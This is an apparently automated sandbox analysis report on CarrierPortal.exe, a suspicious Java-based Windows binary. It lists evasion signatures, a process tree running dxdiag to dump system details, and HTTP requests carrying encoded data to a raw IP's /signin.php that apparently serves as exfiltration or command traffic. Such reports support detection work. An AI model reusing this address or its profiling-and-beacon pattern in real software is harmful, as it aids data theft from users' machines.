
Windows Analysis Report
CarrierPortal.exe

Overview

General Information

Sample name: CarrierPortal.exe
Analysis ID: 1584233
MD5: 4c6d58378be4b9051debfb5670f5b82c
SHA1: 851cc9c8753aa28ad94123e642b34d778d8fe30e
SHA256: 19b883fd205513f2c8d7933a35ff86c63194312a75a6ff9a83a1c649b55603da

Detection

Score: 45
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Loading BitLocker PowerShell Module
Monitors registry run keys for changes
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Query firmware table information (likely to detect VMs)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a global mouse hook
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Execution of Suspicious File Type Extension
Spawns drivers
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64_ra
  • CarrierPortal.exe (PID: 3012 cmdline: "C:\Users\user\Desktop\CarrierPortal.exe" MD5: 4C6D58378BE4B9051DEBFB5670F5B82C)
    • cmd.exe (PID: 6904 cmdline: cmd.exe /c dxdiag /t C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txt MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dxdiag.exe (PID: 6988 cmdline: dxdiag /t C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txt MD5: 19AB5AD061BF013EBD012D0682DF37E5)
  • mstee.sys (PID: 4 cmdline: MD5: 244C73253E165582DDC43AF4467D23DF)
  • mskssrv.sys (PID: 4 cmdline: MD5: 26854C1F5500455757BC00365CEF9483)
  • powershell.exe (PID: 3024 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • CarrierPortal.exe (PID: 1092 cmdline: "C:\Users\user\Desktop\CarrierPortal.exe" MD5: 4C6D58378BE4B9051DEBFB5670F5B82C)
      • cmd.exe (PID: 4048 cmdline: cmd.exe /c dxdiag /t C:\Users\user\AppData\Local\Temp\z6bA4AJyM3lgigrkALKVxYH0Lsl0yEgV.txt MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • dxdiag.exe (PID: 1316 cmdline: dxdiag /t C:\Users\user\AppData\Local\Temp\z6bA4AJyM3lgigrkALKVxYH0Lsl0yEgV.txt MD5: 19AB5AD061BF013EBD012D0682DF37E5)
  • Taskmgr.exe (PID: 6936 cmdline: "C:\Windows\system32\taskmgr.exe" /4 MD5: 58D5BC7895F7F32EE308E34F06F25DD5)
  • Taskmgr.exe (PID: 3920 cmdline: "C:\Windows\system32\taskmgr.exe" /4 MD5: 58D5BC7895F7F32EE308E34F06F25DD5)
  • cleanup
No configs have been found
No yara matches
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\mstee.sys, NewProcessName: C:\Windows\System32\drivers\mstee.sys, OriginalFileName: C:\Windows\System32\drivers\mstee.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: mstee.sys
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 3024, ProcessName: powershell.exe
No Suricata rule has matched

Source: CarrierPortal.exe | Static PE information: certificate valid
Source: CarrierPortal.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BasicDisplay.pdb | source: dxdiag.exe, 00000004.00000003.1198351485.000001D76470D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000015.00000003.1729056136.00000143D2092000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BasicDisplay.pdbUGP | source: dxdiag.exe, 00000004.00000003.1198351485.000001D76470D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000015.00000003.1729056136.00000143D2092000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: unknown | TCP traffic detected without corresponding DNS query: 162.243.76.72 (reported 10 times)
Source: global traffic | HTTP traffic detected: GET /signin.php?form=form&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D&data=… HTTP/1.1 User-Agent: Java/23.0.1 Host: 162.243.76.72 Accept: */* Connection: keep-alive (reported twice)
Source: CarrierPortal.exe, CarrierPortal.exe, 00000012.00000002.1830734275.000001E77811D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://162.243.76.72/signin.php
Source: CarrierPortal.exe, 00000012.00000002.1830734275.000001E77811D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://162.243.76.72/signin.php?
Source: CarrierPortal.exe | String found in binary or memory: http://162.243.76.72/signin.php?form=form&post=
Source: CarrierPortal.exe, 00000012.00000002.1830734275.000001E77811D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://162.243.76.72/signin.php?form=form&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D&data=PW93VktSa1l4QVhNU1Z
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html)_
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.htmlax
Source: CarrierPortal.exe | String found in binary or memory: http://crl.certigna.fr/certignarootca.crl
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: CarrierPortal.exe | String found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: CarrierPortal.exe | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CarrierPortal.exe | String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crllW
Source: CarrierPortal.exe | String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl.securetrust.com/STCA.crl;_
Source: CarrierPortal.exe | String found in binary or memory: http://crl.securetrust.com/STCA.crlE
Source: CarrierPortal.exe | String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.c7H
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.co
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.mtH
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://policy.camerfirma.com
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://policy.camerfirma.com0
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://policy.camerfirma.com3b
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://repository.swisssign.com/
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://repository.swisssign.com/0
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://repository.swisssign.com/YF
Source: CarrierPortal.exe | String found in binary or memory: http://www.chambersign.org
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.chambersign.org1
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.quovadis.bm
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.quovadis.bm0
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.quovadis.bmB
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.quovadisglobal.com/cps
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: CarrierPortal.exe | String found in binary or memory: https://ocsp.quovadisoffshore.com
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com(
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: CarrierPortal.exe | String found in binary or memory: https://ocsp.quovadisoffshore.com9
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: https://repository.luxtrust.lu
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: https://repository.luxtrust.lu#
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: https://repository.luxtrust.lu0
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: https://repository.luxtrust.luYa
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: https://repository.luxtrust.luc
Source: CarrierPortal.exe | String found in binary or memory: https://www.graalvm.org/
Source: CarrierPortal.exe | String found in binary or memory: https://www.graalvm.org/dev/reference-manual/native-image/dynamic-features/CertificateManagement/#ru
Source: CarrierPortal.exe | String found in binary or memory: https://www.graalvm.org/latest/reference-manual/native-image/metadata/#
Source: CarrierPortal.exe | String found in binary or memory: https://www.graalvm.org/latest/reference-manual/native-image/metadata/#g
Source: CarrierPortal.exe | String found in binary or memory: https://www.graalvm.org/latest/reference-manual/native-image/metadata/#resources-and-resource-bundle
Source: CarrierPortal.exe | String found in binary or memory: https://www.graalvm.org/latest/reference-manual/native-image/metadata/#serialization
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: https://wwww.certigna.fr/autorites/
Source: CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: C:\Windows\System32\dxdiag.exe | Windows user hook set: 0 mouse low level C:\Windows\system32\dinput8.dll
Source: C:\Users\user\Desktop\CarrierPortal.exe | Code function: 0_2_00000146244C9B2A
Source: C:\Users\user\Desktop\CarrierPortal.exe | Code function: 0_2_0000014625021738
Source: unknown | Driver loaded: C:\Windows\System32\drivers\mstee.sys
Source: CarrierPortal.exe | Binary string: (long run of Winsock error messages and Java/JNI class, method and field names, omitted)
Source: classification engine | Classification label: mal45.evad.winEXE@17/17@0/1
Source: C:\Users\user\Desktop\CarrierPortal.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\83aa4cc77f591dfc2374580bbd95f6ba_9e146be9-c76a-4720-bcdb-53011b87bd06
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\Taskmgr.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\TM.750ce7b0-e5fd-454f-9fad-2f66513dfa1b
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_762381681
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6884:120:WilError_03
Source: C:\Users\user\Desktop\CarrierPortal.exe | File created: C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txt
Source: CarrierPortal.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\dxdiag.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor (reported 4 times)
Source: C:\Windows\System32\dxdiag.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\CarrierPortal.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: CarrierPortal.exe | String found in binary or memory: cn=chambers of commerce root - 2008,o=ac camerfirma s.a.,2.5.4.5=#1309413832373433323837,l=madrid (see current address at www.camerfirma.com/address),c=eu
Source: CarrierPortal.exe | String found in binary or memory: cn=global chambersign root - 2008,o=ac camerfirma s.a.,2.5.4.5=#1309413832373433323837,l=madrid (see current address at www.camerfirma.com/address),c=eui
Source: CarrierPortal.exe | String found in binary or memory: <K:Ljava/lang/Object;>Ljdk/internal/loader/AbstractClassLoaderValue<Ljdk/internal/loader/AbstractClassLoaderValue<TCLV;TV;>.Sub<TK;>;TV;>;
Source: CarrierPortal.exe | String found in binary or memory: <CLV:Ljdk/internal/loader/AbstractClassLoaderValue<TCLV;TV;>;V:Ljava/lang/Object;>Ljava/lang/Object;Ljava/util/function/Supplier<TV;>;
Source: CarrierPortal.exe | String found in binary or memory: <V:Ljava/lang/Object;>Ljdk/internal/loader/AbstractClassLoaderValue<Ljdk/internal/loader/ClassLoaderValue<TV;>;TV;>;
Source: CarrierPortal.exe | String found in binary or memory: t<V:Ljava/lang/Object;>Ljdk/internal/loader/AbstractClassLoaderValue<Ljdk/internal/loader/ClassLoaderValue<TV;>;TV;>;
Source: CarrierPortal.exe | String found in binary or memory: Use '-XX:-InstallSegfaultHandler' to disable the segfault handler at run time and create a core dump instead.
Source: CarrierPortal.exe | String found in binary or memory: nUse '-XX:-InstallSegfaultHandler' to disable the segfault handler at run time and create a core dump instead.
Source: CarrierPortal.exe | String found in binary or memory: <CLV:Ljdk/internal/loader/AbstractClassLoaderValue<TCLV;TV;>;V:Ljava/lang/Object;>Ljava/lang/Object;
Source: CarrierPortal.exe | String found in binary or memory: d<CLV:Ljdk/internal/loader/AbstractClassLoaderValue<TCLV;TV;>;V:Ljava/lang/Object;>Ljava/lang/Object;
Source: CarrierPortal.exe | String found in binary or memory: Rebuild with '-R:-InstallSegfaultHandler' to disable the handler permanently at build time.
Source: CarrierPortal.exe | String found in binary or memory: [Rebuild with '-R:-InstallSegfaultHandler' to disable the handler permanently at build time.b
Source: CarrierPortal.exe | String found in binary or memory: l=madrid (see current address at www.camerfirma.com/address)!wSup
Source: CarrierPortal.exe | String found in binary or memory: <l=madrid (see current address at www.camerfirma.com/address)!wSup
Source: CarrierPortal.exe | String found in binary or memory: l=madrid (see current address at www.camerfirma.com/address)
Source: CarrierPortal.exe | String found in binary or memory: <l=madrid (see current address at www.camerfirma.com/address)
Source: CarrierPortal.exe | String found in binary or memory: Ljdk/internal/loader/BootLoader;
Source: CarrierPortal.exe | String found in binary or memory: Africa/Addis_Ababa
Source: CarrierPortal.exe | String found in binary or memory: Africa/Addis_Ababa,v
Source: unknown | Process created: C:\Users\user\Desktop\CarrierPortal.exe "C:\Users\user\Desktop\CarrierPortal.exe"
Source: C:\Users\user\Desktop\CarrierPortal.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c dxdiag /t C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txt
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txt
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\Desktop\CarrierPortal.exe "C:\Users\user\Desktop\CarrierPortal.exe"
Source: C:\Users\user\Desktop\CarrierPortal.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c dxdiag /t C:\Users\user\AppData\Local\Temp\z6bA4AJyM3lgigrkALKVxYH0Lsl0yEgV.txt
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Temp\z6bA4AJyM3lgigrkALKVxYH0Lsl0yEgV.txt
Source: unknown | Process created: C:\Windows\System32\Taskmgr.exe "C:\Windows\system32\taskmgr.exe" /4
Source: unknown | Process created: C:\Windows\System32\Taskmgr.exe "C:\Windows\system32\taskmgr.exe" /4
Source: C:\Users\user\Desktop\CarrierPortal.exe | Sections loaded (in order): apphelp.dll, version.dll, userenv.dll, vcruntime140.dll, vcruntime140_1.dll, winhttp.dll, ncrypt.dll, secur32.dll, iphlpapi.dll, sspicli.dll, ntasn1.dll, kernel.appcore.dll, mswsock.dll, cryptsp.dll, rsaenh.dll, profapi.dll, dpapi.dll, cryptbase.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, dnsapi.dll, winrnr.dll, rasadhlp.dll, fwpuclnt.dll
Source: C:\Windows\System32\cmd.exe | Sections loaded: apphelp.dll
Source: C:\Windows\System32\dxdiag.exe | Sections loaded (in order): apphelp.dll, kernel.appcore.dll, uxtheme.dll, dxdiagn.dll, d3d11.dll, d3d12.dll, cryptsp.dll, powrprof.dll, devobj.dll, winmmbase.dll, dxgi.dll, wmiclnt.dll, umpdc.dll, msasn1.dll, wbemcomn.dll, amsi.dll, userenv.dll, profapi.dll, winbrand.dll, wldp.dll, windows.storage.dll, dsound.dll, resourcepolicyclient.dll, devrtl.dll, spinf.dll, drvstore.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, spfileq.dll, wifidisplay.dll, sspicli.dll, dnsapi.dll, iphlpapi.dll, mswsock.dll, wlanapi.dll, mmdevapi.dll, mfplat.dll, rtworkq.dll, mf.dll, mfcore.dll, ksuser.dll, mfsensorgroup.dll, comppkgsup.dll, windows.media.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: windows.applicationmodel.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dispbroker.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d12core.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dxilconv.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3dscache.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: mscat32.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: ddraw.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dciman32.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: avrt.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: audioses.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: msacm32.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: midimap.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dinput8.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: hid.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: devenum.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: quartz.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
